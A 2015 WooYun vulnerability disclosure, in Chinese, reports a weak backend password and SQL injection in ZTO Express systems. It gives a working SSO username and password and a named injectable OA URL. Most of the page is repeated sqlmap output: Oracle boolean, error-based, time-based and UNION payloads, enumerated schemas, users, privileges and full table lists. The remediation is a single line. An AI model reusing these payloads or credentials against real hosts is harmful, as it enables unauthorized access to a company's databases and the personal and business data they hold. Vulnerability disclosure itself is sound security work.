当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151138

漏洞标题:中通速递某后台弱口令&某重要系统SQL注射影响7个库(第二发)

相关厂商:中通速递

漏洞作者: 路人甲

提交时间:2015-11-02 15:13

修复时间:2015-12-17 15:54

公开时间:2015-12-17 15:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

后台弱口令+SQL注射

详细说明:

https://sso.zt-express.com


账号:18758251755
密码:zto888888

1.png


2.png


3.png


4.png


注入点:

http://oa.zt-express.com/OA/InfoCenter/NobillInfo/showbig.aspx?method=&billnumber=716665&sign=nobillinfo


Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||C
HR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (80
35=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||
CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERS
T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||
CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR
(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(11
2)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo
---
[20:53:48] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[20:53:48] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[20:53:48] [INFO] fetching database (schema) names
[20:53:48] [INFO] the SQL query used returns 7 entries
[20:53:48] [INFO] retrieved: CTXSYS
[20:53:49] [INFO] retrieved: EXFSYS
[20:53:49] [INFO] retrieved: MDSYS
[20:53:49] [INFO] retrieved: NEWZTOOA
[20:53:50] [INFO] retrieved: OLAPSYS
[20:53:50] [INFO] retrieved: SYS
[20:53:50] [INFO] retrieved: SYSTEM
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OLAPSYS
[*] SYS
[*] SYSTEM


Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OLAPSYS
[*] SYS
[*] SYSTEM
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CONSIGNMENTID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
database management system users privileges:
[*] NEWZTOOA [15]:
privilege: ADMINISTER DATABASE TRIGGER
privilege: CREATE DATABASE LINK
privilege: CREATE JOB
privilege: CREATE PROCEDURE
privilege: CREATE PUBLIC SYNONYM
privilege: CREATE SEQUENCE
privilege: CREATE SESSION
privilege: CREATE TABLE
privilege: CREATE TRIGGER
privilege: CREATE TYPE
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DEBUG ANY PROCEDURE
privilege: DEBUG CONNECT SESSION
privilege: EXECUTE ANY PROCEDURE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CONSIGNMENTID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
database management system users [29]:
[*] ANONYMOUS
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] READONLY
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CONSIGNMENTID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
Database: SYSTEM
[8 tables]
+----------------------+
| DEF$_TEMP$LOB |
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CONSIGNMENTID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
Database: NEWZTOOA
[119 tables]
+-------------------------------+
| AA |
| DR$CONTENT_IDX$I |
| DR$CONTENT_IDX$R |
| TAB_A |
| TAB_ADDRESS_DISTRICT |
| TAB_ADDRESS_ZIPCODE |
| TAB_CENTER_RATES |
| TAB_GUARD_PIC |
| TAB_NO_PAYBQ |
| TAB_PROVINCE_TEMP |
| TAB_SITE_MONTHCOUNT |
| TAB_TAOBAO_AREA |
| TAB_TAOBAO_COMPLAINT |
| TAB_TAOBAO_GS |
| TAB_TAOBAO_RATE |
| TAB_TAOBAO_SPEED |
| TAB_TEST1 |
| TAB_ZTOA_AIRPORTCODE |
| TAB_ZTOA_AMERCE |
| TAB_ZTOA_AMERCETWO |
| TAB_ZTOA_ARBITRATION |
| TAB_ZTOA_ARBITRATIONAPPEAL |
| TAB_ZTOA_ARBITRATIONDISP |
| TAB_ZTOA_ARBITRATIONDISPSITE |
| TAB_ZTOA_ARBITRATIONMAKEKNOWN |
| TAB_ZTOA_ARBITRATIONSITE |
| TAB_ZTOA_ARBITRATIONSORT |
| TAB_ZTOA_ARBITRATIONTYPE |
| TAB_ZTOA_ASSET_APPLY |
| TAB_ZTOA_ASSET_APPLY_TRACK |
| TAB_ZTOA_ASSET_DICTIONARY |
| TAB_ZTOA_ASSET_NOTES |
| TAB_ZTOA_ASSET_VENDOR |
| TAB_ZTOA_BREAKBILL |
| TAB_ZTOA_BUSLINES |
| TAB_ZTOA_BUSNAME |
| TAB_ZTOA_CAHIERDATA |
| TAB_ZTOA_COMMENTON |
| TAB_ZTOA_CONSIGNMENT |
| TAB_ZTOA_CONSIGNMENTINFO |
| TAB_ZTOA_COURSEWARE |
| TAB_ZTOA_CUSTOMER |
| TAB_ZTOA_DATAINFO |
| TAB_ZTOA_DATASORT |
| TAB_ZTOA_DIGLOG |
| TAB_ZTOA_DISPOSEBOOK |
| TAB_ZTOA_DISPOSESITE |
| TAB_ZTOA_EMPLOYEE |
| TAB_ZTOA_FINANCE_LIST |
| TAB_ZTOA_FINANCE_TYPE |
| TAB_ZTOA_FLIGHTS |
| TAB_ZTOA_FUNCTIONMODULE |
| TAB_ZTOA_GUESTBOOK |
| TAB_ZTOA_HRBASICINFO |
| TAB_ZTOA_HRDUTY |
| TAB_ZTOA_HYPOLINER |
| TAB_ZTOA_HYPOLINERDATA |
| TAB_ZTOA_ITEQUIPMENT |
| TAB_ZTOA_ITREGISTER |
| TAB_ZTOA_ITSTORAGE |
| TAB_ZTOA_ITWORK |
| TAB_ZTOA_K8HELP |
| TAB_ZTOA_LEAVEBEHINDDATA |
| TAB_ZTOA_LOGINPAGE |
| TAB_ZTOA_MAINLINER |
| TAB_ZTOA_MAINLINERDATA |
| TAB_ZTOA_MOTIF |
| TAB_ZTOA_MOTIFCHILD |
| TAB_ZTOA_NEWSDEPARTMENT |
| TAB_ZTOA_NEWSSORT |
| TAB_ZTOA_NOBILL |
| TAB_ZTOA_OLDSCANGUN |
| TAB_ZTOA_ONDUTY |
| TAB_ZTOA_PAISONGFEI |
| TAB_ZTOA_PINGIP |
| TAB_ZTOA_PINGLIST |
| TAB_ZTOA_POSTCODE |
| TAB_ZTOA_POST_REPORT |
| TAB_ZTOA_PROVINCELINER |
| TAB_ZTOA_PROVINCELINERDATA |
| TAB_ZTOA_PUCHA |
| TAB_ZTOA_PUCHA_BAK |
| TAB_ZTOA_RELATINGPOSTCODE |
| TAB_ZTOA_REOPRTSITE |
| TAB_ZTOA_REPORTCHILD |
| TAB_ZTOA_ROLEFUNCTION |
| TAB_ZTOA_ROLES |
| TAB_ZTOA_SITEBOOK |
| TAB_ZTOA_SITEBOOKBACK |
| TAB_ZTOA_SITEMAP |
| TAB_ZTOA_SITEPROVINCE |
| TAB_ZTOA_SITEVISUALIZE |
| TAB_ZTOA_SQLTOCSV |
| TAB_ZTOA_SUFFRAGE |
| TAB_ZTOA_SUPERVISE |
| TAB_ZTOA_TASK |
| TAB_ZTOA_TASK_ADDED |
| TAB_ZTOA_TASK_FILE |
| TAB_ZTOA_TASK_USER |
| TAB_ZTOA_TRANSFERFEE |
| TAB_ZTOA_USERPHONE |
| TAB_ZTOA_USERSITEIT |
| TAB_ZTOA_USERTEL |
| TAB_ZTOA_USERVALIDATE |
| TAB_ZTOA_WEBLOG |
| TAB_ZTOA_WORKLOG |
| TAB_ZTOA_YIYUN1 |
| TAB_ZTOA_YIYUN2 |
| TAB_ZTOA_YZTJYB |
| TAB_ZTOA_ZHIFUBAO |
| TAB_ZTOA_ZTBEST |
| TAB_ZTOOA_IPMANAGE |
| TAB_ZTWEB_BILLSEARCHLOG |
| TAB_ZTWEB_CITY |
| TAB_ZTWEB_EXAMINEE |
| TAB_ZTWEB_JOB |
| TAB_ZTWEB_PROVINCE |
| TAB_ZTWEB_SITE2 |
| TAB_ZTWEB_SLIDE |
+-------------------------------+
sqlmap identified the following injection points with a total of 274 HTTP(s) requests:
---
Parameter: billnumber (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8035=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OLAPSYS
[*] SYS
[*] SYSTEM
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: billnumber (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8035=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
Database: NEWZTOOA
[197 tables]
+-------------------------------+
| AA |
| AAAA |
| BASEITEMS |
| DR$CONTENT_IDX$I |
| DR$CONTENT_IDX$K |
| DR$CONTENT_IDX$N |
| DR$CONTENT_IDX$R |
| TAB_A |
| TAB_ADDRESS_DISTRICT |
| TAB_ADDRESS_ZIPCODE |
| TAB_CENTER_INFO |
| TAB_CENTER_RATES |
| TAB_COMMENT_INFO |
| TAB_COMMENT_LOG |
| TAB_GUARD_PIC |
| TAB_NO_PAYBQ |
| TAB_PROVINCE_TEMP |
| TAB_SITE_MONTHCOUNT |
| TAB_TAOBAO_AREA |
| TAB_TAOBAO_COMPLAINT |
| TAB_TAOBAO_GS |
| TAB_TAOBAO_RATE |
| TAB_TAOBAO_SPEED |
| TAB_TEST |
| TAB_TEST1 |
| TAB_TREE |
| TAB_VOTE_EMPLOYEE |
| TAB_VOTE_EMPLOYEE2014 |
| TAB_ZTOA_AIRPORTCODE |
| TAB_ZTOA_AMERCE |
| TAB_ZTOA_AMERCETWO |
| TAB_ZTOA_APPEARANCE |
| TAB_ZTOA_ARBITRATION |
| TAB_ZTOA_ARBITRATIONAPPEAL |
| TAB_ZTOA_ARBITRATIONDISP |
| TAB_ZTOA_ARBITRATIONDISPSITE |
| TAB_ZTOA_ARBITRATIONDUTYTYPE |
| TAB_ZTOA_ARBITRATIONMAKEKNOWN |
| TAB_ZTOA_ARBITRATIONSITE |
| TAB_ZTOA_ARBITRATIONSORT |
| TAB_ZTOA_ARBITRATIONTYPE |
| TAB_ZTOA_ASSET_APPLY |
| TAB_ZTOA_ASSET_APPLY_TRACK |
| TAB_ZTOA_ASSET_DICTIONARY |
| TAB_ZTOA_ASSET_NOTES |
| TAB_ZTOA_ASSET_VENDOR |
| TAB_ZTOA_BALE |
| TAB_ZTOA_BASESITE |
| TAB_ZTOA_BREAKBILL |
| TAB_ZTOA_BUSLINES |
| TAB_ZTOA_BUSNAME |
| TAB_ZTOA_CAHIERDATA |
| TAB_ZTOA_CARDFEES |
| TAB_ZTOA_CARDGS |
| TAB_ZTOA_COMMENTON |
| TAB_ZTOA_CONSIGNMENT |
| TAB_ZTOA_CONSIGNMENTINFO |
| TAB_ZTOA_CONTRABAND |
| TAB_ZTOA_COURSELECMAIN |
| TAB_ZTOA_COURSETYPE |
| TAB_ZTOA_COURSEWARE |
| TAB_ZTOA_COURSEWARENEW |
| TAB_ZTOA_CUSTOMER |
| TAB_ZTOA_DATAINFO |
| TAB_ZTOA_DATASORT |
| TAB_ZTOA_DIGLOG |
| TAB_ZTOA_DISPOSEBOOK |
| TAB_ZTOA_DISPOSESITE |
| TAB_ZTOA_DISPOSESITETWO |
| TAB_ZTOA_EMPLOYEE |
| TAB_ZTOA_EXPEDITEDATA |
| TAB_ZTOA_FAREINFO |
| TAB_ZTOA_FINANCE_LIST |
| TAB_ZTOA_FINANCE_TYPE |
| TAB_ZTOA_FLIGHTS |
| TAB_ZTOA_FUNCTIONMODULE |
| TAB_ZTOA_FUNCTIONMODULEBACK |
| TAB_ZTOA_GUESTBOOK |
| TAB_ZTOA_HRBASICINFO |
| TAB_ZTOA_HRDUTY |
| TAB_ZTOA_HRZHU |
| TAB_ZTOA_HRZI |
| TAB_ZTOA_HYPOLINER |
| TAB_ZTOA_HYPOLINERDATA |
| TAB_ZTOA_IMAGESTYPE |
| TAB_ZTOA_INVESTIGATE |
| TAB_ZTOA_ITBUEQUIPMENT |
| TAB_ZTOA_ITDELGOLD |
| TAB_ZTOA_ITEQUIPMENT |
| TAB_ZTOA_ITPROCESS |
| TAB_ZTOA_ITPROCESS_LIST |
| TAB_ZTOA_ITREGISTER |
| TAB_ZTOA_ITSTORAGE |
| TAB_ZTOA_ITWORK |
| TAB_ZTOA_ITWORKLOG |
| TAB_ZTOA_K8HELP |
| TAB_ZTOA_LEAVEBEHINDDATA |
| TAB_ZTOA_LECTURER |
| TAB_ZTOA_LOGINPAGE |
| TAB_ZTOA_MAINLINER |
| TAB_ZTOA_MAINLINERDATA |
| TAB_ZTOA_MOTIF |
| TAB_ZTOA_MOTIFCHILD |
| TAB_ZTOA_NETMAP |
| TAB_ZTOA_NEWS |
| TAB_ZTOA_NEWSCOMMENTON |
| TAB_ZTOA_NEWSDEPARTMENT |
| TAB_ZTOA_NEWSSORT |
| TAB_ZTOA_NOBILL |
| TAB_ZTOA_NOINAREA |
| TAB_ZTOA_OLDSCANGUN |
| TAB_ZTOA_ONDUTY |
| TAB_ZTOA_PAISONGFEI |
| TAB_ZTOA_PEER |
| TAB_ZTOA_PINGIP |
| TAB_ZTOA_PINGLIST |
| TAB_ZTOA_POSTCODE |
| TAB_ZTOA_POST_REPORT |
| TAB_ZTOA_PROVINCELINER |
| TAB_ZTOA_PROVINCELINERDATA |
| TAB_ZTOA_PUCHA |
| TAB_ZTOA_PUCHA_BAK |
| TAB_ZTOA_QHSOURCEINFO |
| TAB_ZTOA_QHSOURCETYPE |
| TAB_ZTOA_RELATINGPOSTCODE |
| TAB_ZTOA_REOPRTSITE |
| TAB_ZTOA_REPORTCHILD |
| TAB_ZTOA_REPORTVIOL |
| TAB_ZTOA_ROLEFUNCTION |
| TAB_ZTOA_ROLEFUNCTIONBACK |
| TAB_ZTOA_ROLES |
| TAB_ZTOA_SITEBOOK |
| TAB_ZTOA_SITEBOOKBACK |
| TAB_ZTOA_SITEBOOKTWO |
| TAB_ZTOA_SITECENTER |
| TAB_ZTOA_SITEEMPLOYEE |
| TAB_ZTOA_SITEINFO |
| TAB_ZTOA_SITEMAC |
| TAB_ZTOA_SITEMAP |
| TAB_ZTOA_SITEPROVINCE |
| TAB_ZTOA_SITESTATISTICS |
| TAB_ZTOA_SITEVISUALIZE |
| TAB_ZTOA_SPACE |
| TAB_ZTOA_SQLTOCSV |
| TAB_ZTOA_SUFFRAGE |
| TAB_ZTOA_SUM_GJ |
| TAB_ZTOA_SUM_ZTO |
| TAB_ZTOA_SUPERVISE |
| TAB_ZTOA_SUPERVISETWO |
| TAB_ZTOA_TASK |
| TAB_ZTOA_TASK_ADDED |
| TAB_ZTOA_TASK_FILE |
| TAB_ZTOA_TASK_USER |
| TAB_ZTOA_TRANSFERCENTERCAR |
| TAB_ZTOA_TRANSFERFEE |
| TAB_ZTOA_UNLOADDATA |
| TAB_ZTOA_USEROWNERPROVINCE |
| TAB_ZTOA_USERPHONE |
| TAB_ZTOA_USERSITEIT |
| TAB_ZTOA_USERTEL |
| TAB_ZTOA_USERVALIDATE |
| TAB_ZTOA_VEHICLE |
| TAB_ZTOA_VIOLATIONFINES |
| TAB_ZTOA_VIOLATIONPACKAGE |
| TAB_ZTOA_VIOLATIONPACKAGETYPE |
| TAB_ZTOA_WEBLOG |
| TAB_ZTOA_WORKLOG |
| TAB_ZTOA_WORKLOG_ADD |
| TAB_ZTOA_YIYUN1 |
| TAB_ZTOA_YIYUN2 |
| TAB_ZTOA_YIYUN3_YUNJIA |
| TAB_ZTOA_YZTJ22 |
| TAB_ZTOA_YZTJ23 |
| TAB_ZTOA_YZTJ24 |
| TAB_ZTOA_YZTJJ22 |
| TAB_ZTOA_YZTJJ23 |
| TAB_ZTOA_YZTJYB |
| TAB_ZTOA_ZHIFUBAO |
| TAB_ZTOA_ZTBEST |
| TAB_ZTOOA_IPMANAGE |
| TAB_ZTOPDA_PROVIDE |
| TAB_ZTWEB_BILLSEARCHLOG |
| TAB_ZTWEB_CITY |
| TAB_ZTWEB_EXAMINEE |
| TAB_ZTWEB_JOB |
| TAB_ZTWEB_NEWS |
| TAB_ZTWEB_PROVINCE |
| TAB_ZTWEB_SITE |
| TAB_ZTWEB_SITE2 |
| TAB_ZTWEB_SLIDE |
| TOAD_PLAN_TABLE |
| ZHONGTONG_ZHONGCAI_CHUFA |
| ZHONGTONG_ZHONGCAI_RIZHI |
| ZHONGTONG_ZHONGCAI_SHENQING |
| ZHONGTONG_ZHONGCAI_SHENSU |
| ZHONGTONG_ZHONGCAI_WANGDIAN |
| ZHONGTONG_ZHONGCAI_XIADA |
+-------------------------------+


Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||C
HR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (80
35=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||
CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERS
T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||
CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR
(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(11
2)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo
---
[21:57:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[21:57:22] [INFO] fetching database users
[21:57:23] [INFO] the SQL query used returns 29 entries
[21:57:23] [INFO] retrieved: READONLY
[21:57:23] [INFO] retrieved: WEIXIN
[21:57:23] [INFO] retrieved: OGG_SYNC
[21:57:23] [INFO] retrieved: CRM
[21:57:25] [INFO] retrieved: DBMS
[21:57:25] [INFO] retrieved: WULIAO
[21:57:25] [INFO] retrieved: ZHONGCAI
[21:57:25] [INFO] retrieved: NEWZTOOA
[21:57:26] [INFO] retrieved: ZTOWEB
[21:57:26] [INFO] retrieved: MDDATA
[21:57:26] [INFO] retrieved: MDSYS
[21:57:27] [INFO] retrieved: SI_INFORMTN_SCHEMA
[21:57:27] [INFO] retrieved: ORDPLUGINS
[21:57:27] [INFO] retrieved: ORDSYS
[21:57:28] [INFO] retrieved: OLAPSYS
[21:57:28] [INFO] retrieved: WDOA
[21:57:28] [INFO] retrieved: ANONYMOUS
[21:57:28] [INFO] retrieved: XDB
[21:57:28] [INFO] retrieved: CTXSYS
[21:57:29] [INFO] retrieved: EXFSYS
[21:57:29] [INFO] retrieved: WMSYS
[21:57:29] [INFO] retrieved: ORACLE_OCM
[21:57:29] [INFO] retrieved: DBSNMP
[21:57:29] [INFO] retrieved: TSMSYS
[21:57:32] [INFO] retrieved: DMSYS
[21:57:32] [INFO] retrieved: DIP
[21:57:32] [INFO] retrieved: OUTLN
[21:57:33] [INFO] retrieved: SYSTEM
[21:57:33] [INFO] retrieved: SYS
database management system users [29]:
[*] ANONYMOUS
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] READONLY
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB


漏洞证明:

修复方案:

修改密码,过滤sql特殊字符

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

